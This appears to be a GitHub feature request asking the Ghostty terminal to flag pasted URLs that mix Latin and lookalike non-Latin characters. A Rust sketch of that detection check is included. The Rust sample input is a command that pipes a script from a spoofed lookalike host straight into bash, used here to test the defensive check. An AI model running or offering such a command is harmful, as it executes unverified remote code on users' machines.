Consider adding some detection of homograph attacks #10599
Unanswered
rmunn
asked this question in
Feature Requests, Ideas
Replies: 1 comment
IMO that's definitely something we could add if it doesn't prove to be too much logic. Feel free to PR this if you have the time.
https://github.com/sheeki03/tirith has an example of a homograph attack, where someone constructs a URL that looks legitimate but points to a completely different location than you think it does:
In theory you should never blindly run scripts downloaded from the Internet without reading them first. In practice too many sites tell people to run `curl some-url | bash` to install their software, and too many people blindly follow those instructions.
Ghostty already warns you if you're about to paste text into the terminal that looks like it might run commands. But it would also be nice if it could have some logic that says "if a URL contains a mix of Latin-script and non-Latin characters in the same word, consider that suspicious and warn about it". E.g., something similar to the logic found at https://github.com/sheeki03/tirith/blob/main/crates/tirith-core/src/homoglyph.rs.
There are plenty of perfectly legitimate URLs entirely written in non-Latin characters. But there are very very few legitimate URLs written with a mix of Latin characters and lookalike characters like Cyrillic lowercase і. Seeing a URL that contains Latin characters alongside non-Latin lookalikes is a red flag, and it would be nice if Ghostty could help detect if you are pasting such a URL into your terminal.
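A sketch of the mixed-script check the request describes, added here as an example; it is not code from Ghostty or from tirith. The function names, the hand-picked script ranges and the choice to inspect only the host labels of each URL are assumptions, and the sample paste is constructed.

```rust
// Simplified script buckets (assumption): a production check would use full
// Unicode Script data rather than these hand-picked ranges.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum Script { Latin, Greek, Cyrillic, Other }

fn script_of(c: char) -> Option<Script> {
    if !c.is_alphabetic() { return None; } // digits, '-', '_' are script-neutral
    Some(match c {
        'a'..='z' | 'A'..='Z' | '\u{00C0}'..='\u{024F}' => Script::Latin,
        '\u{0370}'..='\u{03FF}' => Script::Greek,
        '\u{0400}'..='\u{052F}' => Script::Cyrillic,
        _ => Script::Other,
    })
}

// Host part of a URL: drop scheme, path/query/fragment, userinfo and port.
// IPv6 literals are not parsed.
fn host_of(url: &str) -> &str {
    let rest = url.split_once("://").map_or(url, |(_, r)| r);
    let authority = rest.split(|c: char| matches!(c, '/' | '?' | '#')).next().unwrap_or("");
    let host = authority.rsplit_once('@').map_or(authority, |(_, h)| h);
    host.split(':').next().unwrap_or("")
}

// Host labels ("words" between dots) that mix Latin with any other script.
// An all-Cyrillic or all-Latin label is not reported.
fn mixed_script_labels(url: &str) -> Vec<String> {
    host_of(url).split('.').filter(|label| {
        let mut seen: Vec<Script> = Vec::new();
        for s in label.chars().filter_map(script_of) {
            if !seen.contains(&s) { seen.push(s); }
        }
        seen.contains(&Script::Latin) && seen.len() > 1
    }).map(str::to_string).collect()
}

// Scan pasted text for URL-like tokens and collect their suspicious labels.
fn suspicious_in_paste(text: &str) -> Vec<String> {
    text.split_whitespace()
        .filter(|tok| tok.contains("://"))
        .flat_map(|tok| mixed_script_labels(tok))
        .collect()
}

fn main() {
    // Constructed sample paste: U+0456 (Cyrillic i) stands in for Latin 'i'.
    let paste = "curl https://m\u{0456}rror.example/install.sh | bash";
    for label in suspicious_in_paste(paste) {
        println!("warning: mixed-script host label {}", label.escape_default());
    }
}
```

Escaping the flagged label in the warning matters: printing it raw would show the same lookalike text the user was already fooled by.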